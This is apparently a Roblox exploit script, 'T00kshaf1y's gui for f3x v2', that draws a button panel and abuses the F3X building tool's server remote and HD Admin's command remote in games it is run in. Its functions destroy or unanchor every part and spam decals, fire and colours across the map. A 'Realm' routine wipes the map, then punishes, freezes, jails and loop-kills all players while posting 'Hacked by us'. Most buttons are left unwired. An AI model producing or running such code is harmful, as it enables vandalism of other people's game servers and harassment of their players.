-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ScrollingFrame = Instance.new("ScrollingFrame")
local UIListLayout = Instance.new("UIListLayout")

-- Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
Frame.BorderColor3 = Color3.fromRGB(0, 255, 255)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.509130776, 0, 0.163316652, 0)
Frame.Size = UDim2.new(0, 546, 0, 594)

-- Add background decal to frame
local BackgroundDecal = Instance.new("Decal")
BackgroundDecal.Parent = Frame
BackgroundDecal.Texture = "rbxassetid://123452321164348"
BackgroundDecal.Face = Enum.NormalId.Top

ScrollingFrame.Parent = Frame
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ScrollingFrame.BackgroundTransparency = 1.000
ScrollingFrame.BorderSizePixel = 0
ScrollingFrame.Size = UDim2.new(1, 0, 1, 0)
ScrollingFrame.CanvasSize = UDim2.new(0, 0, 3, 0)
ScrollingFrame.ScrollBarThickness = 8

UIListLayout.Parent = ScrollingFrame
UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center
UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
UIListLayout.Padding = UDim.new(0, 5)

-- Title Label
local TextLabel = Instance.new("TextLabel")
TextLabel.Parent = ScrollingFrame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Size = UDim2.new(0, 543, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "T00kshaf1y's gui for f3x v2"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 35.000
TextLabel.LayoutOrder = 1

-- Function to create standard buttons
local function createButton(name, layoutOrder, text, textSize)
    local button = Instance.new("TextButton")
    button.Name = name
    button.Parent = ScrollingFrame
    button.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
    button.BorderColor3 = Color3.fromRGB(255, 0, 0)
    button.BorderSizePixel = 2
    button.LayoutOrder = layoutOrder
    button.Size = UDim2.new(0, 200, 0, 50)
    button.Font = Enum.Font.SourceSans
    button.Text = text
    button.TextColor3 = Color3.fromRGB(255, 255, 255)
    button.TextSize = textSize or 18.000
    return button
end

-- Create all buttons from both GUIs
local buttons = {
    -- Tools Section
    {name = "GetBtools", layout = 2, text = "Get Btools", size = 18},
    {name = "SendMessage", layout = 3, text = "Send Message", size = 18},
    
    -- Skybox Section
    {name = "Skybox1", layout = 4, text = "Skybox", size = 18},
    {name = "Skybox2", layout = 5, text = "Skybox 2", size = 22},
    {name = "IslamSkybox", layout = 6, text = "Islam Skybox", size = 22},
    {name = "Skybox3", layout = 7, text = "Skybox 3", size = 22},
    {name = "ProtoSkybox", layout = 8, text = "Proto Skybox", size = 14},
    {name = "PtkidSkybox2", layout = 9, text = "Ptkid Skybox 2", size = 14},
    
    -- Decal Section
    {name = "DecalSpam", layout = 10, text = "Decal Spam", size = 18},
    {name = "DecalSpam2", layout = 11, text = "Decal Spam 2", size = 22},
    {name = "IslamDecalSpam", layout = 12, text = "Islam Decal Spam", size = 22},
    {name = "DecalSpam3", layout = 13, text = "Decal Spam 3", size = 22},
    {name = "ProtoDecalSpam", layout = 14, text = "Proto Decal Spam", size = 14},
    {name = "PtkidDecalSpam2", layout = 15, text = "Ptkid Decal Spam 2", size = 14},
    
    -- Texture Section
    {name = "ProtoTextureSpam", layout = 16, text = "Proto Texture Spam", size = 14},
    {name = "PtkidTextureSpam2", layout = 17, text = "Ptkid Texture Spam 2", size = 14},
    
    -- Chat Section
    {name = "ForceChat", layout = 18, text = "Force Chat", size = 18},
    {name = "Message1", layout = 19, text = "Message 1", size = 14},
    {name = "Message2", layout = 20, text = "Message 2", size = 14},
    
    -- Fire Section
    {name = "FireAll", layout = 21, text = "Fire All", size = 18},
    
    -- Player Management
    {name = "TitleMe", layout = 22, text = "Title Me", size = 18},
    {name = "TitleOthers", layout = 23, text = "Title Others", size = 14},
    {name = "InvisibleAll", layout = 24, text = "Invisible All", size = 14},
    {name = "TeamNameAll", layout = 25, text = "Team Name All", size = 14},
    {name = "BecomeT00kshaf1y", layout = 26, text = "Become T00kshaf1y", size = 14},
    {name = "BecomeTubers93", layout = 27, text = "Become Tubers93", size = 14},
    {name = "BecomeC00lkidd", layout = 28, text = "Become c00lkidd", size = 14},
    
    -- Time Section
    {name = "Night", layout = 29, text = "Night", size = 18},
    {name = "Day", layout = 30, text = "Day", size = 18},
    
    -- Map Section
    {name = "SaveMap", layout = 31, text = "Save Map", size = 18},
    {name = "DeleteBaseplate", layout = 32, text = "Delete Baseplate", size = 25},
    {name = "Baseplate", layout = 33, text = "Baseplate", size = 14},
    {name = "DestroyAll", layout = 34, text = "Destroy All", size = 25},
    {name = "DestroyMap", layout = 35, text = "Destroy The Map", size = 40},
    
    -- Color Section
    {name = "RandomColorSpam", layout = 36, text = "Random Color Spam", size = 25},
    {name = "ColorSpam2", layout = 37, text = "Color Spam 2", size = 14},
    
    -- Anchor Section
    {name = "UnanchorAll", layout = 38, text = "Unanchor All", size = 25},
    {name = "UnanchorAll2", layout = 39, text = "Unanchor All 2", size = 14},
    
    -- Teleport Section
    {name = "BringAll", layout = 40, text = "Bring All", size = 18},
    {name = "TPAllMeepCity", layout = 41, text = "TP All to Meep City 4", size = 14},
    {name = "TPOtherMeepCity", layout = 42, text = "TP Other to Meep City 4", size = 14},
    
    -- Crash Section
    {name = "CrashAll", layout = 43, text = "Crash All", size = 18},
    
    -- Anti-Skid Section
    {name = "AntiSkid", layout = 44, text = "Anti Skid", size = 18},
    {name = "AntiSkid2", layout = 45, text = "Anti Skid 2", size = 14},
    
    -- Freeze Section
    {name = "FreezeAll", layout = 46, text = "Freeze All", size = 14},
    
    -- Jail Section
    {name = "JailAll", layout = 47, text = "Jail All", size = 14},
    
    -- Hint Section
    {name = "Hint1", layout = 48, text = "Hint 1", size = 14},
    {name = "Hint2", layout = 49, text = "Hint 2", size = 14},
    {name = "Hint3", layout = 50, text = "Hint 3", size = 14},
    {name = "Hint4", layout = 51, text = "Hint 4", size = 14},
    
    -- Dog Section
    {name = "DogAll", layout = 52, text = "Dog All", size = 14},
    
    -- Fog Section
    {name = "Fog", layout = 53, text = "Fog", size = 14},
    
    -- Disco Section
    {name = "Disco", layout = 54, text = "Disco", size = 14},
    
    -- Tank Section
    {name = "TankAll", layout = 55, text = "Tank All", size = 14},
    
    -- Kill Section
    {name = "KillAll", layout = 56, text = "Kill All", size = 14},
    
    -- Realm Section
    {name = "Realm", layout = 57, text = "Realm", size = 40},
    
    -- Car Section
    {name = "CarAll", layout = 58, text = "Car All", size = 14},
    
    -- Fling Section
    {name = "FlingAll", layout = 59, text = "Fling All", size = 14},
    
    -- Unfly Section
    {name = "UnflyAll", layout = 60, text = "Unfly All", size = 14},
    
    -- Mute Section
    {name = "MuteAll", layout = 61, text = "Mute All", size = 14},
    
    -- Blur Section
    {name = "BlurAll", layout = 62, text = "Blur All", size = 14},
    
    -- Alert Section
    {name = "Alert", layout = 63, text = "Alert", size = 14},
    {name = "Alert2", layout = 64, text = "Alert 2", size = 14},
    
    -- Kick Section
    {name = "KickAll", layout = 65, text = "Kick All", size = 14},
    
    -- Punish Section (只有一个独立的Punish按钮)
    {name = "PunishAll", layout = 66, text = "Punish All", size = 14},
    
    -- Team Spam Section
    {name = "TeamSpam", layout = 67, text = "Team Spam", size = 14},
    
    -- Ice Section
    {name = "IceAll", layout = 68, text = "Ice All", size = 14},
}

-- Create all buttons
local buttonInstances = {}
for _, buttonInfo in pairs(buttons) do
    buttonInstances[buttonInfo.name] = createButton(buttonInfo.name, buttonInfo.layout, buttonInfo.text, buttonInfo.size)
end

-- Music Section Label
local MusicLabel = Instance.new("TextLabel")
MusicLabel.Parent = ScrollingFrame
MusicLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MusicLabel.BackgroundTransparency = 1.000
MusicLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
MusicLabel.BorderSizePixel = 0
MusicLabel.Size = UDim2.new(0, 543, 0, 30)
MusicLabel.Font = Enum.Font.SourceSans
MusicLabel.Text = "Music Section"
MusicLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
MusicLabel.TextSize = 25.000
MusicLabel.LayoutOrder = 69

-- Music Buttons
local musicButtons = {
    {name = "Music1", layout = 70, text = "IDK", size = 18},
    {name = "Music2", layout = 71, text = "Ba Fang Lai Cai", size = 18},
    {name = "Music3", layout = 72, text = "Team's Theme", size = 18},
    {name = "Music4", layout = 73, text = "c00lkidd", size = 18},
    {name = "Music5", layout = 74, text = "Jumpstyle", size = 14},
    {name = "Music6", layout = 75, text = "Funk", size = 14},
    {name = "Music7", layout = 76, text = "Wind of the Flords", size = 14},
    {name = "Music8", layout = 77, text = "Whistle", size = 14},
    {name = "Music9", layout = 78, text = "IDK 2", size = 14},
    {name = "SpartaRemix", layout = 79, text = "Sparta Remix", size = 14},
}

-- Create music buttons
for _, buttonInfo in pairs(musicButtons) do
    buttonInstances[buttonInfo.name] = createButton(buttonInfo.name, buttonInfo.layout, buttonInfo.text, buttonInfo.size)
end

-- Scripts:

local function KHLZ_fake_script() -- Frame.LocalScript 
    local script = Instance.new('LocalScript', Frame)

    local UserInputService = game:GetService("UserInputService")
    
    local gui = script.Parent
    
    local dragging
    local dragInput
    local dragStart
    local startPos
    
    local function update(input)
        local delta = input.Position - dragStart
        gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
    end
    
    gui.InputBegan:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
            dragging = true
            dragStart = input.Position
            startPos = gui.Position
    
            input.Changed:Connect(function()
                if input.UserInputState == Enum.UserInputState.End then
                    dragging = false
                end
            end)
        end
    end)
    
    gui.InputChanged:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
            dragInput = input
        end
    end)
    
    UserInputService.InputChanged:Connect(function(input)
        if input == dragInput and dragging then
            update(input)
        end
    end
end
coroutine.wrap(KHLZ_fake_script)()

-- F3X API Functions
local function getF3XTool()
    local player = game.Players.LocalPlayer
    local char = player.Character
    local backpack = player.Backpack
    
    for _, v in ipairs(backpack:GetChildren()) do
        if v:FindFirstChild("SyncAPI") then
            return v
        end
    end
    for _, v in ipairs(char:GetChildren()) do
        if v:FindFirstChild("SyncAPI") then
            return v
        end
    end
    return nil
end

local f3x = getF3XTool()
local remote = f3x and f3x.SyncAPI.ServerEndpoint

local function f3xInvoke(args)
    if remote then
        remote:InvokeServer(unpack(args))
    end
end

-- F3X Building Functions
local function SetCollision(part, boolean)
    local args = {
        [1] = "SyncCollision",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["CanCollide"] = boolean
            }
        }
    }
    f3xInvoke(args)
end

local function SetAnchor(boolean, part)
    local args = {
        [1] = "SyncAnchor",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Anchored"] = boolean
            }
        }
    }
    f3xInvoke(args)
end

local function CreatePart(cf, parent, partType)
    local args = {
        [1] = "CreatePart",
        [2] = partType or "Normal",
        [3] = cf,
        [4] = parent
    }
    f3xInvoke(args)
end

local function DestroyPart(part)
    local args = {
        [1] = "Remove",
        [2] = {
            [1] = part
        }
    }
    f3xInvoke(args)
end

local function Resize(part, size, cf)
    local args = {
        [1] = "SyncResize",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["CFrame"] = cf,
                ["Size"] = size
            }
        }
    }
    f3xInvoke(args)
end

local function AddMesh(part)
    local args = {
        [1] = "CreateMeshes",
        [2] = {
            [1] = {
                ["Part"] = part
            }
        }
    }
    f3xInvoke(args)
end

local function SetMesh(part, meshid)
    local args = {
        [1] = "SyncMesh",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["MeshId"] = "rbxassetid://"..meshid
            }
        }
    }
    f3xInvoke(args)
end

local function SetTexture(part, texid)
    local args = {
        [1] = "SyncMesh",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["TextureId"] = "rbxassetid://"..texid
            }
        }
    }
    f3xInvoke(args)
end

local function SetName(part, stringg)
    local args = {
        [1] = "SetName",
        [2] = {
            [1] = part
        },
        [3] = stringg
    }
    f3xInvoke(args)
end

local function MeshResize(part, size)
    local args = {
        [1] = "SyncMesh",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Scale"] = size
            }
        }
    }
    f3xInvoke(args)
end

local function SetLocked(part, boolean)
    local args = {
        [1] = "SetLocked",
        [2] = {
            [1] = part
        },
        [3] = boolean
    }
    f3xInvoke(args)
end

local function SetTrans(part, int)
    local args = {
        [1] = "SyncMaterial",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Transparency"] = int
            }
        }
    }
    f3xInvoke(args)
end

local function Color(part, color)
    local args = {
        [1] = "SyncColor",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Color"] = color,
                ["UnionColoring"] = false
            }
        }
    }
    f3xInvoke(args)
end

local function SpawnDecal(part, side)
    local args = {
        [1] = "CreateTextures",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Face"] = side,
                ["TextureType"] = "Decal"
            }
        }
    }
    f3xInvoke(args)
end

local function AddDecal(part, asset, side)
    local args = {
        [1] = "SyncTexture",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Face"] = side,
                ["TextureType"] = "Decal",
                ["Texture"] = "rbxassetid://".. asset
            }
        }
    }
    f3xInvoke(args)
end

local function SpawnTexture(part, side)
    local args = {
        [1] = "CreateTextures",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Face"] = side,
                ["TextureType"] = "Texture"
            }
        }
    }
    f3xInvoke(args)
end

local function AddTexture(part, asset, side)
    local args = {
        [1] = "SyncTexture",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["Face"] = side,
                ["TextureType"] = "Texture",
                ["Texture"] = "rbxassetid://".. asset
            }
        }
    }
    f3xInvoke(args)
end

local function AddFire(part)
    local args = {
        [1] = "CreateDecorations",
        [2] = {
            [1] = {
                ["Part"] = part,
                ["DecorationType"] = "Fire"
            }
        }
    }
    f3xInvoke(args)
end

-- HD Admin Functions
local function HDAdminCommand(command)
    local ReplicatedStorage = game:GetService("ReplicatedStorage")
    local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent
    RequestCommand:InvokeServer(command)
end

-- Skybox Functions
local function Sky(id)
    local player = game.Players.LocalPlayer
    local char = player.Character
    local e = math.floor(char.HumanoidRootPart.CFrame.x)
    local f = math.floor(char.HumanoidRootPart.CFrame.y)
    local g = math.floor(char.HumanoidRootPart.CFrame.z)
    
    CreatePart(CFrame.new(e, f, g) + Vector3.new(0,6,0), workspace)
    
    for i,v in game.Workspace:GetDescendants() do
        if v:IsA("BasePart") and v.CFrame.x == e and v.CFrame.z == g then
            SetName(v,"Sky")
            AddMesh(v)
            SetMesh(v,"111891702759441")
            SetTexture(v,id)
            MeshResize(v,Vector3.new(99999,99999,99999))
            SetLocked(v,true)
        end
    end
end

-- Decal Spam Functions
local function DecalSpam(id)
    for i,v in game.workspace:GetDescendants() do
        if v:IsA("BasePart") then
            spawn(function()
                SetLocked(v,false)
                SpawnDecal(v,Enum.NormalId.Front)
                AddDecal(v,id,Enum.NormalId.Front)
                SpawnDecal(v,Enum.NormalId.Back)
                AddDecal(v,id,Enum.NormalId.Back)
                SpawnDecal(v,Enum.NormalId.Right)
                AddDecal(v,id,Enum.NormalId.Right)
                SpawnDecal(v,Enum.NormalId.Left)
                AddDecal(v,id,Enum.NormalId.Left)
                SpawnDecal(v,Enum.NormalId.Bottom)
                AddDecal(v,id,Enum.NormalId.Bottom)
                SpawnDecal(v,Enum.NormalId.Top)
                AddDecal(v,id,Enum.NormalId.Top)
            end)
        end
    end 
end

-- Texture Spam Functions
local function TextureSpam(id)
    for i,v in game.workspace:GetDescendants() do
        if v:IsA("BasePart") then
            spawn(function()
                SetLocked(v,false)
                SpawnTexture(v,Enum.NormalId.Front)
                AddTexture(v,id,Enum.NormalId.Front)
                SpawnTexture(v,Enum.NormalId.Back)
                AddTexture(v,id,Enum.NormalId.Back)
                SpawnTexture(v,Enum.NormalId.Right)
                AddTexture(v,id,Enum.NormalId.Right)
                SpawnTexture(v,Enum.NormalId.Left)
                AddTexture(v,id,Enum.NormalId.Left)
                SpawnTexture(v,Enum.NormalId.Bottom)
                AddTexture(v,id,Enum.NormalId.Bottom)
                SpawnTexture(v,Enum.NormalId.Top)
                AddTexture(v,id,Enum.NormalId.Top)
            end)
        end
    end 
end

-- Color Spam Functions
local function RandomColorSpam()
    for i,v in game.Workspace:GetDescendants() do
        if v:IsA("BasePart") then
            spawn(function()
                SetLocked(v,false)
                Color(v,Color3.new(math.random(0,255)/255, math.random(0,255)/255, math.random(0,255)/255))
            end)
        end
    end
end

-- Fire All Function
local function FireAll()
    for i,v in game.Workspace:GetDescendants() do
        spawn(function()
            SetLocked(v,false)
            AddFire(v)
        end)
    end
end

-- Unanchor All Function
local function UnanchorAll()
    for i,v in game.Workspace:GetDescendants() do
        spawn(function()
            SetLocked(v,false)
            SetAnchor(false,v)
        end)
    end
end

-- Destroy All Function
local function DestroyAll()
    for i,v in game.Workspace:GetDescendants() do
        if v:IsA("BasePart") then
            spawn(function()
                DestroyPart(v)
            end)
        end
    end
end

-- Baseplate Function
local function CreateBaseplate()
    local player = game.Players.LocalPlayer
    local char = player.Character
    local hrpx = math.floor(char.HumanoidRootPart.CFrame.x)
    local hrpz = math.floor(char.HumanoidRootPart.CFrame.z)
    local hrpy = math.floor(char.HumanoidRootPart.CFrame.y)
    
    CreatePart(CFrame.new(hrpx,hrpy-20,hrpz),workspace,"Spawn")
    
    for i,v in game.Workspace:GetChildren() do
        if v:IsA("BasePart") and v.CFrame.y == hrpy - 20 and v.CFrame.x == hrpx then
            spawn(function()
                Resize(v,Vector3.new(700,2,700),CFrame.new(hrpx,hrpy-20,hrpz))
                Color(v,Color3.fromRGB(55,55,55))
                SpawnTexture(v,Enum.NormalId.Top)
                AddTexture(v,"0",Enum.NormalId.Top)
                while wait(1) do
                    pcall(function() SetLocked(v,true) end)
                end
            end)
        end
    end
end

local function CreateRealm()
    HDAdminCommand(";btools me")
    HDAdminCommand(";sm Team t00kshaf1y join now!!")
    wait(0.6)
    HDAdminCommand(";fogcolor black")
    wait(0.5)
    HDAdminCommand(";punish all")
    HDAdminCommand(";m Hacked by us")
    wait(0.1)
    HDAdminCommand(";sh You are about to go to our realm!!")
      
    for _, v in ipairs(workspace:GetDescendants()) do
        if v:IsA("BasePart") or v:IsA("UnionOperation") then
            spawn(function()
                DestroyPart(v)
            end)
        end
    end
    
    wait(1)
    
    local position = CFrame.new(0, 5, 0)
    local base = CreatePart(position, workspace, "Normal")
    Resize(base, Vector3.new(512, 16, 512), position)
    Color(base, Color3.fromRGB(100, 100, 100))
    SetName(base, "RealmBase")
    SetLocked(base, true)
    
    local spawnpos = CFrame.new(34.5, 8.1, -26)
    local spawna = CreatePart(spawnpos, workspace, "Spawn")
    Resize(spawna, Vector3.new(20, 10, 20), spawnpos)
    SetName(spawna, "SpawnLocation")
    SetLocked(spawna, true)
    
    local skyPosition = CFrame.new(0, 5, 0)
    local sky = CreatePart(skyPosition, workspace, "Normal")
    AddMesh(sky)
    SetMesh(sky, "111891702759441")
    SetTexture(sky, "118953088842031")
    MeshResize(sky, Vector3.new(99999, 99999, 99999))
    SetLocked(sky, true)
    SetName(sky, "Skybox")
    SetCollision(sky, false)

    HDAdminCommand(";res all")
    wait(0.3)
    HDAdminCommand(";r6 all")
    HDAdminCommand(";blur all")
    wait(2.8)
    HDAdminCommand(";fog")
    HDAdminCommand(";sh This is the realm of team T00kshaf1y!")
    HDAdminCommand(";disco")
    HDAdminCommand(";n Team t00kshaf1y join now!!")
    wait(2.0)
    HDAdminCommand(";alert all Welcome to our team's realm!!")
    HDAdminCommand(";fire all")
    HDAdminCommand(";dog all")
    wait(1.6)
    HDAdminCommand(";title me t00kshaf1y")
    HDAdminCommand(";name all t00kshaf1y")
    wait(2.0)
    HDAdminCommand(";time 23")
    HDAdminCommand(";music 1847661821 ;volume inf ;pitch 1.1")
    wait(5.0)
    HDAdminCommand(";char all ttsghdvhfc2")
    HDAdminCommand(";freeze all")
    HDAdminCommand(";sh hacked by team t00kshaf1y")
    HDAdminCommand(";sm This game was destroyed by us!")    
    wait(3.0)
    HDAdminCommand(";jail all")
    HDAdminCommand(";sh lol")
    HDAdminCommand(";loopkill all")
    
    print("Realm creation completed!")
end

buttonInstances["Realm"].MouseButton1Click:Connect(function()
    CreateRealm()
end)

buttonInstances["PunishAll"].MouseButton1Click:Connect(function()
    HDAdminCommand(";punish all")
end)


print("T00kshaf1y's gui for f3x v2 loaded successfully! Realm function is ready!")
